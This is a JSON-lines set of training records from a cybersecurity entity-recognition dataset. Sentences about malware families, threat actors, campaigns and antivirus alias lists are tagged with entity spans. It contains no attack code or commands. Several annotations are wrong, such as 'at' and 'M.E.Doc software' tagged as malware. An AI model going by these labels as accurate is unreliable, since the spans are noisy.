{"text": "But the 3rd ASEAN-United States Summit on 21 November 2015 did not disappoint.", "spans": {"ORGANIZATION: 3rd ASEAN-United States Summit": [[8, 38]]}, "info": {"id": "cyner2_train_002119", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.OnGamesLT180912HKGHAAI.Trojan Trojan-Downloader.Win32.Losabel!O Downloader.Losabel.Win32.540 Trojan/Downloader.Losabel.nx Win32.Trojan.WisdomEyes.16070401.9500.9999 Trojan.Popwin BehavesLike.Win32.Trojan.fh TrojanDownloader.Losabel.cx Trojan[Downloader]/Win32.Losabel TrojanDropper:Win32/Idicaf.A Trojan/Win32.OnlineGameHack.C187141 Trojan.DL.Losabel!C2fG9tSV6gk Trj/Pupack.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002121", "source": "cyner2_train"}}
{"text": "It appears to be run by a Russian-speaking group of hackers.", "spans": {"THREAT_ACTOR: Russian-speaking group of hackers.": [[26, 60]]}, "info": {"id": "cyner2_train_002124", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Kazy.D54BC4 Win32.Trojan.WisdomEyes.16070401.9500.9993 Tool.PassView.859 Trojan/Blocker.jhq Win32.Troj.Foxhiex.a.kcloud Trojan/Win32.Zbot.C284570 Trojan.MSIL.CryptoObfuscator Trj/GdSda.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002125", "source": "cyner2_train"}}
{"text": "A backdoor also known as: P2P-Worm.Win32.Krepper!O Worm.Krepper.A.mue Worm.Krepper.Win32.1 W32/Krepper.c W32.IRCBot Win32/Sndc.A WORM_SHAREBOT.A Win.Worm.Poom-1 P2P-Worm.Win32.Krepper.c Trojan.Win32.Krepper.dqeaqt Troj.GameThief.W32.OnLineGames.lgKp Win32.Worm-p2p.Krepper.Ljjq Worm.Win32.Krepper.C Win32.HLLW.Krepper WORM_SHAREBOT.A BehavesLike.Win32.PUPXAX.lz W32/Pcbot.A@p2p Trojan/Krepper.ad WORM/Krepper.C Worm[P2P]/Win32.Krepper Worm:Win32/Krepper.B Trojan.Win32.Krepper.11808 P2P-Worm.Win32.Krepper.c Worm.Krepper I-Worm.Krepper.C Win32/Krepper.C Worm.P2P.Krepper!dcAWP425Bzk P2P-Worm.Win32.Krepper W32/Krepper.C!worm", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002126", "source": "cyner2_train"}}
{"text": "Through our on-going investigation and monitoring of this targeted attack campaign, we found suspicious URLs that hosted a newly discovered zero-day exploit in Java now identified by Oracle as CVE-2015-2590.", "spans": {"THREAT_ACTOR: attack campaign,": [[67, 83]], "VULNERABILITY: zero-day exploit": [[140, 156]], "SYSTEM: Java": [[160, 164]], "ORGANIZATION: Oracle": [[183, 189]]}, "info": {"id": "cyner2_train_002130", "source": "cyner2_train"}}
{"text": "The campaign was identified starting with the registration on 2023-04-05 16:04:51 up to the latest registration on 2023-04-10 08:33:28.", "spans": {"THREAT_ACTOR: The campaign": [[0, 12]]}, "info": {"id": "cyner2_train_002131", "source": "cyner2_train"}}
{"text": "It has been attacking Iranian users.", "spans": {}, "info": {"id": "cyner2_train_002132", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan/W32.Makecall.20484 Trojan.Makecall Trojan.Makecall.Win32.5 TROJ_MAKECALL.A W32/MalwareF.VJTB W32.Makecall.Trojan TROJ_MAKECALL.A Trojan.Win32.Makecall.a Trojan.Win32.Makecall.fkdu Trojan.Win32.S.Makecall.20484 Troj.W32.Makecall.a!c Trojan.MulDrop.717 BehavesLike.Win32.VBObfus.mz W32/Risk.QDBN-9051 Trojan/MakeCall.d TR/Makecall.a Trojan/Win32.Makecall Trojan:Win32/Makecall.A Trojan.Win32.Makecall.a Trojan/Win32.Makecall.R109087 SScope.Trojan.VBRA.3284 Win32/Makecall.A Win32.Trojan.Makecall.Ecul Trojan.Makecall!Hu8pme7fStI Trojan.Win32.Makecall W32/Makecall.A!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002133", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Win32/Sipay.ADV Trojan.Crypt.GU Trojan/W32.Small.15872.S Trojan.Small.Win32.4658 Trojan/Small.xut Trojan.Win32.Small.glefu Win32/TrojanDownloader.FakeAlert.JI WORM_SMALL.MDA Trojan.Small-8598 Trojan.Crypt.GU Trojan.Crypt.GU Trojan.Small!AZKO6qCeQTg Trojan.Win32.Small.15872.Q[h] Trojan.Dropper/AdobeFake Trojan.Crypt.GU TrojWare.Win32.Small.~YE Trojan.Crypt.GU Trojan.DownLoader10.48865 WORM_SMALL.MDA W32/Trojan2.EQHY Trojan/Small.fnb Trojan/Win32.Small Win32.Troj.Small.kcloud Trojan.Crypt.GU Win-Trojan/Downloader.15872.GU TrojanDownloader:Win32/Bofang.C Trojan.Crypt.GU Trojan.Small Trojan-Downloader.HG W32/FakeAlert.JI!tr.dldr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002134", "source": "cyner2_train"}}
{"text": "In addition, Xbot will steal all SMS messages and contact information, intercept certain SMS messages, and parse SMS messages for mTANs Mobile Transaction Authentication Number from banks.", "spans": {"MALWARE: Xbot": [[13, 17]], "ORGANIZATION: banks.": [[182, 188]]}, "info": {"id": "cyner2_train_002135", "source": "cyner2_train"}}
{"text": "Using both the Elknot and BillGates DDoS malware, these attackers have continued to infect vulnerable Elasticsearch servers in order to enhance their DDoS capabilities.", "spans": {"MALWARE: Elknot": [[15, 21]], "MALWARE: BillGates DDoS malware,": [[26, 49]], "THREAT_ACTOR: attackers": [[56, 65]], "VULNERABILITY: vulnerable": [[91, 101]], "SYSTEM: Elasticsearch servers": [[102, 123]]}, "info": {"id": "cyner2_train_002136", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan/KillAV.a TROJ_SPNR.38J614 Backdoor.Trojan TROJ_SPNR.38J614 Uds.Dangerousobject.Multi!c Trojan.Patched.Win64.2566 W64/Trojan.HLJR-4976 Trojan.KillAV!apRF/prfUvc Trojan.Win64.Killav W64/KillAV.A!tr Trj/CI.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002137", "source": "cyner2_train"}}
{"text": "It now appears to be in the league of full-blown banking trojans such as Dyreza, Neverquest/Vawtrak, Zeus, etc.", "spans": {"MALWARE: banking trojans": [[49, 64]], "MALWARE: Dyreza, Neverquest/Vawtrak, Zeus,": [[73, 106]]}, "info": {"id": "cyner2_train_002138", "source": "cyner2_train"}}
{"text": "DIMNIE is a modular information stealer profiled earlier this year by security researchers at PaloAlto s Unit 42, who found the malware in targeted phishing attacks against open-source developers.", "spans": {"MALWARE: DIMNIE": [[0, 6]], "ORGANIZATION: security researchers": [[70, 90]], "ORGANIZATION: PaloAlto": [[94, 102]], "ORGANIZATION: Unit 42,": [[105, 113]], "MALWARE: malware": [[128, 135]], "ORGANIZATION: open-source developers.": [[173, 196]]}, "info": {"id": "cyner2_train_002139", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.UserinitWininit.Trojan Trojan.Delf.QEO Trojan.Bancteian.CB4 Trojan.Delf.QEO Trojan/Spy.Delf.qgs Trojan.Delf.QEO Win32.Virus.Delf.c W32/Delf.UD TROJ_BANCTEIAN.SM Win.Trojan.Bancteian-0-6418983-0 Trojan.Delf.QEO Trojan.Delf.QEO Trojan.Win32.Delf.3301398 Trojan.Delf.QEO Backdoor.Win32.Delf.~DD Trojan.Delf.QEO Adware.BrowseFox.Win32.220566 TROJ_BANCTEIAN.SM BehavesLike.Win32.Trojan.wh Trojan.Win32.Bancteian W32/Delf.CERT-0413 Trojan.Reconyc.apf W32.Trojan.Delf TR/BAS.Samca.lsswh Trojan/Win32.Delf.nbw Trojan:Win32/Bancteian.B Trojan/Win32.Bancteian.R174475 Trojan.Reconyc Trojan.Win32.Delf.qgs W32/Delf.QGS!tr.spy", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002141", "source": "cyner2_train"}}
{"text": "In one of our previous blog entries, we covered how the threat actor known as Winnti was using GitHub to spread malware – a development that shows how the group is starting to evolve and use new attack methods beyond their previous tactics involving targeted attacks against gaming, pharmaceutical, and telecommunications companies.", "spans": {"THREAT_ACTOR: the threat actor": [[52, 68]], "THREAT_ACTOR: Winnti": [[78, 84]], "SYSTEM: GitHub": [[95, 101]], "MALWARE: malware": [[112, 119]], "THREAT_ACTOR: the group": [[151, 160]], "ORGANIZATION: gaming, pharmaceutical,": [[275, 298]], "ORGANIZATION: telecommunications companies.": [[303, 332]]}, "info": {"id": "cyner2_train_002145", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.MSIL.Downloader.AD Trojan.MSIL.Downloader.AD Trojan.MSIL.Downloader.AD Trojan.MSIL.Downloader.AD Trojan.Win32.Inject.ewmdhe Troj.MSIL.Disfa.mCrY Trojan.MSIL.Downloader.AD TrojWare.MSIL.Inject.TEQ Trojan.MSIL.Downloader.AD TR/Inject.xbeihg TrojanDownloader:MSIL/Datsup.A Trojan.MSIL.Downloader.AD Trj/CI.A MSIL/Dloader.AWE!tr Win32/Trojan.cd2", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002147", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Exp.RTF.CVE-2017-8759.D Trojan.Mdropper Win32/Exploit.CVE-2017-8759.A TROJ_ARTIEF.JEJOWP Rtf.Downloader.CVE_2017-6336326-3 Exploit.MSOffice.CVE-2017-8759.a Exploit.Ole2.CVE-2017-8759.estduh RTF.S.Exploit.44738 Exploit.Msoffice.Cve!c Exploit.CVE-2017-8759.5 TROJ_ARTIEF.JEJOWP RTF/Trojan.BGKX-2 HEUR:Exploit.MSOffice.CVE-2017-8759.a Exploit.CVE-2017-8759 Office.Exploit.Cve-2017-8759.Ajle Trojan.Win32.Exploit Malicious_Behavior.SB Win32/Trojan.Exploit.024", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002148", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Downloader.Farfly.L Multi.Threats.InArchive W32/Risk.NCBB-0700 Trojan.Farfli Win.Trojan.Downloader-2275 Trojan.Downloader.Farfly.L Trojan.Downloader.Farfly.L Trojan.Win32.Crypted.dkwpfn Trojan.Win32.Z.Downloader.266845 Trojan.Downloader.Farfly.L Trojan.DownLoader4.59614 Downloader.Selvice.Win32.747 TROJ_DLOADR.SMQ Trojan-Downloader.Win32.Selvice W32/MalwareS.ASNW Trojan.Downloader.Farfly.L TrojanDownloader:Win32/Caxnet.B Worm.WhiteIce Trojan.Downloader.Farfly.L Trojan.Downloader.Farfly.L Trojan.DL.Selvice!qQfZyIPcdpU Win32/Trojan.Downloader.6fb", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002149", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Win32.Hijacker.kvdpi TROJ_DYER.BMC Trojan.Enfal-7 HEUR:Trojan.Win32.Invader Trojan.Hijacker!h2YIjU+BiQU Trojan.DownLoader7.14277 TROJ_DYER.BMC Trojan/Invader.exe W32/Bfr.2!tr Trojan[:HEUR]/Win32.Invader Win-Trojan/Inject.16896.IT Win32.Trojan.Hijacker.Ebqw Trojan.Win32.Sanpec Win32/Trojan.1da", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002150", "source": "cyner2_train"}}
{"text": "The attacks we attribute to Scarlet Mimic have primarily targeted Uyghur and Tibetan activists as well as those who are interested in their causes.", "spans": {"THREAT_ACTOR: Scarlet Mimic": [[28, 41]], "ORGANIZATION: Uyghur and Tibetan activists": [[66, 94]]}, "info": {"id": "cyner2_train_002151", "source": "cyner2_train"}}
{"text": "This new threat also uses a macro to infect the target's computer, but rather than retrieving a binary payload, it relies on various scripts to maintain its presence and to communicate via hacked websites, acting as proxies for the command and control server.", "spans": {"MALWARE: new threat": [[5, 15]], "MALWARE: macro": [[28, 33]], "MALWARE: infect": [[37, 43]], "SYSTEM: the target's computer,": [[44, 66]], "MALWARE: binary payload,": [[96, 111]]}, "info": {"id": "cyner2_train_002152", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Downloader.Myxa.Win32.113 Trojan/Downloader.Myxa.cit Trojan.Kazy.D6034 TROJ_MONKIF.SMKP Win32.Trojan.WisdomEyes.16070401.9500.9999 Downloader.Monkif TROJ_MONKIF.SMKP Win.Downloader.100478-1 Trojan.Win32.Myxa.bqhvc Trojan.Win32.A.Downloader.22672.B Trojan.DownLoad3.32720 Trojan-Downloader.Win32.Myxa TrojanDownloader.Myxa.cx TrojanDownloader:Win32/Monkif.T Downloader/Win32.Monkif.R1925 TrojanDownloader.Myxa Trj/Myxa.A Trojan.DL.Myxa!oB3ehXmv9m8", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002154", "source": "cyner2_train"}}
{"text": "When we talk about the attackers, there is this misconception that they are these super villains who can only do evil, but keep in mind they are humans too.", "spans": {"THREAT_ACTOR: attackers,": [[23, 33]]}, "info": {"id": "cyner2_train_002155", "source": "cyner2_train"}}
{"text": "This macro comes into users' systems through a spam email with subjects such as My Resume, Openings, Internship, etc.", "spans": {"MALWARE: macro": [[5, 10]], "SYSTEM: users' systems": [[22, 36]]}, "info": {"id": "cyner2_train_002157", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Android.FakeToken.B A.H.Pay.Erop.YG Android.Trojan.SMSBot.B AndroidOS/FakeToken.B HEUR:Trojan-Banker.AndroidOS.Faketoken.a Android.Trojan.SMSBot.B Trojan.Android.SMSBot.b Android.Malware.Trojan Trojan:Android/SmsSpy.K Android.SmsSend.419.origin AndroidOS/FakeToken.B Trojan[Banker]/Android.Faketoken Android.Troj.at_Stealer.g.kcloud HEUR:Trojan-Banker.AndroidOS.Faketoken.a Android.Trojan.SMSBot.B Trojan.AndroidOS.SendSMS Android/FkToken.B", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002158", "source": "cyner2_train"}}
{"text": "Android malware creators have recently been mixing business with play.", "spans": {"THREAT_ACTOR: Android malware creators": [[0, 24]]}, "info": {"id": "cyner2_train_002160", "source": "cyner2_train"}}
{"text": "DNS is an ideal fit for frequently exporting small chunks of custom encoded data i.e. credit card track 1 and track 2 data to an external, remote location.", "spans": {"SYSTEM: DNS": [[0, 3]]}, "info": {"id": "cyner2_train_002161", "source": "cyner2_train"}}
{"text": "We have recently encountered very aggressive jabber spam campaign, advertising the Philadelphia ransomware.", "spans": {"THREAT_ACTOR: jabber spam campaign,": [[45, 66]], "MALWARE: the Philadelphia ransomware.": [[79, 107]]}, "info": {"id": "cyner2_train_002162", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Zusy.D39A16 Win32.Trojan.WisdomEyes.16070401.9500.9800 Backdoor.Trojan TSPY_REALTIME.A Trojan.RealSpy TSPY_REALTIME.A W32/Risk.KQTT-6320 Trojan/Win32.HDC.C24097", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002163", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan/Downloader.Delf.quw Win32.Trojan.WisdomEyes.16070401.9500.9770 Win.Trojan.Downloader-57555 Trojan.DownLoad2.37645 BehavesLike.Win32.PUPXAS.ch Trojan.Graftor.D1EFD7 TrojanDownloader:Win32/Blortios.C Trojan/Win32.Downloader.R18903 Win32/Trojan.88b", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002164", "source": "cyner2_train"}}
{"text": "In recent weeks, Unit 42 has been analyzing delivery documents used in spear-phishing attacks that drop a custom downloader used in cyber espionage attacks.", "spans": {"ORGANIZATION: Unit 42": [[17, 24]], "MALWARE: custom downloader": [[106, 123]]}, "info": {"id": "cyner2_train_002165", "source": "cyner2_train"}}
{"text": "But over the past week, while performing research using Palo Alto Networks AutoFocus, we noticed a large uptick in the delivery of the Hancitor malware family as they shifted away from H1N1 to distribute Pony and Vawtrak executables.", "spans": {"ORGANIZATION: Palo Alto Networks": [[56, 74]], "SYSTEM: AutoFocus,": [[75, 85]], "MALWARE: the Hancitor malware family": [[131, 158]], "MALWARE: H1N1": [[185, 189]], "MALWARE: Pony": [[204, 208]], "MALWARE: Vawtrak executables.": [[213, 233]]}, "info": {"id": "cyner2_train_002166", "source": "cyner2_train"}}
{"text": "Ransomware sure has had an uptick the past years; more and more variants appear while some have been leading the pack for the past years.", "spans": {"MALWARE: Ransomware": [[0, 10]], "MALWARE: variants": [[64, 72]]}, "info": {"id": "cyner2_train_002167", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan/Clicker.Small.ht Win32/TrojanClicker.Small.HT W32/TrojanX.MXY Smalltroj.BDN Win32.Small.ht Trojan-Clicker.Win32.Small.ht Trojan.Clicker.Small.HT TrojWare.Win32.TrojanClicker.Small.HT Trojan-Clicker.Win32.Small.ht Win32/TrojanClicker.Small.HT TR/Click.Small.HT W32/TrojanX.MXY Trojan-Downloader.Win32.Small!IK Trojan.Click.Small.HT TrojanClicker:Win32/Small.BB Trojan.Clicker.Small.HT Win-Trojan/Downloader.120895 Trojan-Clicker.Win32.Small.ht Trojan-Clicker.Small.HT Trojan-Clicker.Small.HT Trojan.Clicker.Autoit Trojan-Downloader.Win32.Small W32/Small.HT!tr Trj/Downloader.MDW", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002168", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Win32.Badur!O Win32.Trojan.WisdomEyes.16070401.9500.9996 TR/Rogue.1517892 Trojan/Win32.Badur TrojanDownloader:MSIL/Balamid.A Trojan.Zusy.D13D03 Trojan.Badur Trojan.Badur!", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002170", "source": "cyner2_train"}}
{"text": "The company later released a whitepaper which described Qbot version 910 in great detail.", "spans": {"ORGANIZATION: company": [[4, 11]], "MALWARE: Qbot version 910": [[56, 72]]}, "info": {"id": "cyner2_train_002171", "source": "cyner2_train"}}
{"text": "The investigation found a supply chain-focused attack at M.E.Doc software that delivered a destructive payload disguised as ransomware.", "spans": {"MALWARE: at": [[54, 56]], "MALWARE: M.E.Doc software": [[57, 73]], "MALWARE: payload": [[103, 110]], "MALWARE: ransomware.": [[124, 135]]}, "info": {"id": "cyner2_train_002172", "source": "cyner2_train"}}
{"text": "There were several things that struck us as both interesting and concerning about the details; a threat actor known to operate in South East Asia is now using secure sockets layer SSL encryption in their malware.", "spans": {"THREAT_ACTOR: a threat actor": [[95, 109]], "MALWARE: malware.": [[204, 212]]}, "info": {"id": "cyner2_train_002173", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Downloader.Banload.10000 Trojan.Banker Win32.Trojan.WisdomEyes.16070401.9500.9955 Trojan.DownLoader13.22599 W32/Banker.ABCU!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002175", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Downloader.Braidupdate.C Trojan.Downloader.Braidupdate.C Trojan.Win32.Braidupdate.frhy W32/Downloader.AAJ Adware.BrowserAid Win32/TrojanDownloader.Braidupdate.C TROJ_BRAIDUPDT.C Worm.WinUpToDate Trojan-Downloader.Win32.Braidupdate.c Trojan.Downloader.Braidupdate.C Trojan.DL.Braidupdate!ucpSRQWfQfk Win32.Trojan-downloader.Braidupdate.Tayo Trojan.Downloader.Braidupdate.C TrojWare.Win32.TrojanDownloader.Braidupdate.C Trojan.Downloader.Braidupdate.C Trojan.Braid Downloader.Braidupdate.Win32.3 TROJ_BRAIDUPDT.C W32/Downloader.IZKY-4160 TR/Dldr.Braidupda.C W32/Braidupdate.C!tr.dldr Trojan[Downloader]/Win32.Braidupdate Trojan.Downloader.Braidupdate.C Troj.Downloader.W32.Braidupdate.c!c Trojan/Win32.Braidupdate TrojanDownloader:Win32/Braidupdate.C Trojan.Downloader.Braidupdate.C TrojanDownloader.Braidupdate not-a-virus:AdWare.Win32.Cash Trojan.Downloader.Braidupdate.C Downloader.Braidupdate.C Win32/Trojan.Downloader.2d9", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002176", "source": "cyner2_train"}}
{"text": "The Angler Exploti Kit has integrated CVE-2015-5119 leaked from HackingTeam.", "spans": {"MALWARE: Angler Exploti Kit": [[4, 22]], "ORGANIZATION: HackingTeam.": [[64, 76]]}, "info": {"id": "cyner2_train_002177", "source": "cyner2_train"}}
{"text": "Gafgyt botnet attacking Netcore routers", "spans": {"MALWARE: Gafgyt botnet": [[0, 13]], "SYSTEM: Netcore routers": [[24, 39]]}, "info": {"id": "cyner2_train_002182", "source": "cyner2_train"}}
{"text": "During our continued research on Sofacy's Komplex Trojan, we have found a sample of a backdoor Trojan that we believe the Sofacy group uses when targeting individuals running macOS systems.", "spans": {"THREAT_ACTOR: Sofacy's": [[33, 41]], "MALWARE: Komplex": [[42, 49]], "MALWARE: Trojan, we": [[50, 60]], "MALWARE: sample": [[74, 80]], "MALWARE: backdoor Trojan": [[86, 101]], "THREAT_ACTOR: the Sofacy group": [[118, 134]], "ORGANIZATION: individuals": [[155, 166]], "SYSTEM: macOS systems.": [[175, 189]]}, "info": {"id": "cyner2_train_002183", "source": "cyner2_train"}}
{"text": "There are two variations of the emails: one is an order confirmation from a Japanese equipment supplier and the other pretends to come from a local printing company.", "spans": {}, "info": {"id": "cyner2_train_002184", "source": "cyner2_train"}}
{"text": "This post will start to explore some of these obfuscations to get a better understanding of how FormBook works.", "spans": {}, "info": {"id": "cyner2_train_002187", "source": "cyner2_train"}}
{"text": "[Zscaler] has covered Dridex Banking Trojan being delivered via various campaigns involving Office documents with malicious VBA macros in the past.", "spans": {"ORGANIZATION: [Zscaler]": [[0, 9]], "MALWARE: Dridex Banking Trojan": [[22, 43]], "THREAT_ACTOR: campaigns": [[72, 81]], "VULNERABILITY: malicious VBA macros": [[114, 134]]}, "info": {"id": "cyner2_train_002188", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan-GameThief.Win32.OnLineGames!O Win32.Trojan.WisdomEyes.16070401.9500.9987 Trojan.Drondog Win.Downloader.29758-2 Worm.Win32.Downloader.bldi Trojan.Win32.MLW.xzlu W32.W.Downloader.hq!c Trojan.MulDrop.15154 Trojan.Win32.KillAV Worm/Downloader.fd TR/Sorri.O Worm/Win32.Downloader Win32.Troj.DownLoaderT.hu.147456 Trojan:Win32/Wiessy.A Worm/Win32.Downloader.R2522", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002189", "source": "cyner2_train"}}
{"text": "The malware is able to control banking transactions conducted using Internet Explorer, and harvest email credentials, which are in turn used to spread the malware further.", "spans": {"MALWARE: malware": [[4, 11], [155, 162]], "SYSTEM: Internet Explorer,": [[68, 86]]}, "info": {"id": "cyner2_train_002191", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.DownLoader4.13271", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002192", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.DelfiDelfi.Win32.301 Trojan.Win32.DelfiDelfi.cho Trojan.Win32.DelfiDelfi.etgljb W32/Trojan.AITA-6805 Trojan.Win32.DelfiDelfi.cho TrojanDownloader:Win32/Banavkill.A Trj/GdSda.A Trojan.DelfiDelfi! W32/Banker.AEAY!tr.spy Win32/Trojan.af4", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002196", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan-PWS/W32.WebGame.37860.B Trojan-PSW.Win32.Yahu.YPager!O Trojan/PSW.Yahu.YPager.r Trojan.Kazy.D15AC9 Win32.Trojan.WisdomEyes.16070401.9500.9973 W32/Pws.BHSA Win32/YPager.D Trojan.Win32.Scar.kjpu Troj.W32.Scar!c TrojWare.Win32.PSW.YahooPager.R0 Trojan.DownLoader6.48717 Trojan.Yahoo.Win32.38 BehavesLike.Win32.Virus.nt Trojan-PWS.Win32.Yahoo W32/PWS.TYKP-7651 Trojan/PSW.Yahu.y Trojan[PSW]/Win32.Yahu Trojan.Win32.Scar.kjpu Trojan/Win32.Jorik.C1078 Win32/PSW.Yahoo.YPager.R Win32.Trojan.Scar.Pfsz W32/Yahoo_YPager.R!tr.pws", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002197", "source": "cyner2_train"}}
{"text": "The samples we identified target the ATM vendor Diebold.", "spans": {"SYSTEM: ATM vendor Diebold.": [[37, 56]]}, "info": {"id": "cyner2_train_002198", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan-Dropper.Win32.Taob.ag Trojan.DR.Taob!NlMVsECgQGE Trojan.MulDrop4.3634 TR/PSW.OnlineGames.wtog TrojanDropper.Taob.o Win32.Troj.Taob.ag.kcloud Trojan:Win32/Cortheaper.A Trojan-GameThief.Win32.OnLineGames", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002199", "source": "cyner2_train"}}
{"text": "At the time it was removed, the plugin was installed on more than 200,00 sites, albeit we cannot be sure how many of these were updated to a version that included the malicious behavior.", "spans": {}, "info": {"id": "cyner2_train_002201", "source": "cyner2_train"}}
{"text": "Finished ! * * * End translation * * * Referring again to bit.ly , we can see click statistics for this campaign ( Figure 6 ) .", "spans": {}, "info": {"id": "cyner2_train_002202", "source": "cyner2_train"}}
{"text": "Twitter user @hkashfi posted a Tweet saying that one of his friends received a file US Travel Docs Information.jar from someone posing as USTRAVELDOCS.COM support personnel using the Skype account ustravelidocs-switzerland notice the i between travel and docs .", "spans": {"ORGANIZATION: Twitter": [[0, 7]], "ORGANIZATION: user @hkashfi": [[8, 21]]}, "info": {"id": "cyner2_train_002204", "source": "cyner2_train"}}
{"text": "Successful exploitation typically results in malware calling back to one or more Uyghur themed domain names.", "spans": {"VULNERABILITY: exploitation": [[11, 23]], "MALWARE: malware": [[45, 52]], "ORGANIZATION: Uyghur": [[81, 87]]}, "info": {"id": "cyner2_train_002205", "source": "cyner2_train"}}
{"text": "Banking Trojans continue to evolve and threat actors are using them in new ways, even as the massive Dridex campaigns of 2015 have given way to ransomware and other payloads.", "spans": {"MALWARE: Banking Trojans": [[0, 15]], "THREAT_ACTOR: threat actors": [[39, 52]], "THREAT_ACTOR: Dridex campaigns": [[101, 117]], "MALWARE: ransomware": [[144, 154]], "MALWARE: payloads.": [[165, 174]]}, "info": {"id": "cyner2_train_002206", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Vburses Trojan.Win32.Vburses", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002207", "source": "cyner2_train"}}
{"text": "During the operation, the malware was used to dox 400,000 members of Vietnam Airlines.", "spans": {"THREAT_ACTOR: operation,": [[11, 21]], "MALWARE: malware": [[26, 33]], "ORGANIZATION: Vietnam Airlines.": [[69, 86]]}, "info": {"id": "cyner2_train_002211", "source": "cyner2_train"}}
{"text": "The Trojan deletes Volume Shadow Copies.", "spans": {"MALWARE: Trojan": [[4, 10]]}, "info": {"id": "cyner2_train_002212", "source": "cyner2_train"}}
{"text": "The MuddyWater attacks are primarily against Middle Eastern nations.", "spans": {"THREAT_ACTOR: The MuddyWater": [[0, 14]]}, "info": {"id": "cyner2_train_002214", "source": "cyner2_train"}}
{"text": "Elirks, less widely known than PlugX, is a basic backdoor Trojan, first discovered in 2010, that is primarily used to steal information from compromised systems.", "spans": {"MALWARE: Elirks,": [[0, 7]], "MALWARE: PlugX,": [[31, 37]], "MALWARE: basic backdoor Trojan,": [[43, 65]], "SYSTEM: compromised systems.": [[141, 161]]}, "info": {"id": "cyner2_train_002216", "source": "cyner2_train"}}
{"text": "Through our research on the Windows KLRD keylogger from the Odinaff report, we were able to discover several new keyloggers.", "spans": {"MALWARE: Windows KLRD keylogger": [[28, 50]], "ORGANIZATION: Odinaff": [[60, 67]], "MALWARE: keyloggers.": [[113, 124]]}, "info": {"id": "cyner2_train_002217", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Hacktool.Mapiget W32/MalwareF.HUIZ Trojan.Badname HackTool.Win32.MapiGet.a Trojan.Win32.MapiGet.cwwjwt Hacktool.W32.Mapiget!c Trojan.KeyLogger.28306 Tool.MapiGet.Win32.1 W32/Risk.LFSI-6446 HackTool.MapiGet.a Misc.HackTool.MailLogger TR/Spy.Mail.G HackTool/Win32.MapiGet Trojan.Graftor.D3C87F HackTool.Win32.MapiGet.a Win32.Hacktool.Mapiget.Iso TrojanSpy.Mail!RGqYbEAheeQ HackTool.Win32.MapiGet Win32/Trojan.Hacktool.eb5", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002218", "source": "cyner2_train"}}
{"text": "A backdoor also known as: BackDoor-FHS.dr Trojan/Witthy.a Trojan.Win32.Clicker.crbxjx Trojan.Click2.48783 BehavesLike.Win32.VirRansom.cc Trojan.Win32.Merlos TR/Rogue.7786243 Trj/CI.A Win32/Witthy.A W32/Witthy.A!tr.bdr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002219", "source": "cyner2_train"}}
{"text": "Recent samples of the malware have now included the ability to use Google services for command-and-control C&C communication.", "spans": {"MALWARE: malware": [[22, 29]], "SYSTEM: Google services": [[67, 82]]}, "info": {"id": "cyner2_train_002220", "source": "cyner2_train"}}
